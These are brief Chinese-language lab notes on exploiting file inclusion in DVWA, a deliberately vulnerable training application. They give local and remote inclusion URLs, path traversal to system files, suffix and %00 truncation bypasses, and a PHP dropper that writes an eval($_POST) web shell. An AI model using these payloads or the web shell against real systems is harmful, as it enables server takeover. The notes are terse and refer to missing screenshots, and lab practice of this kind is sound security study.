dvwa
初级
本地包含
http://192.168.84.139/dvwa/vulnerabilities/fi/?page=C:/Windows/win.ini
包含上传文件(先找到文件所在目录,用../返回上一级)
http://192.168.84.139/dvwa/vulnerabilities/fi/?page=../../../phpinfo.php
远程包含
http://192.168.84.139/dvwa/vulnerabilities/fi/?page=http://192.168.0.105/1.txt
中级
采用如下方式绕过
其他的绕过
1.后缀名处理,该网站对被包含的文件默认加上了.php后缀
改文件名后缀绕过(暂时没搞懂有时候有用有时候没有)
将本要上传的1.php文件名改为1,这样在加上.php后就可以了(1.php内容:<?fputs(fopen("test1tshell.php","w"),'<?php eval($_POST[attack]);?>')?>)
%00截断
如图在该页面包含该木马文件时这个目录下生成了test1shell.php木马文件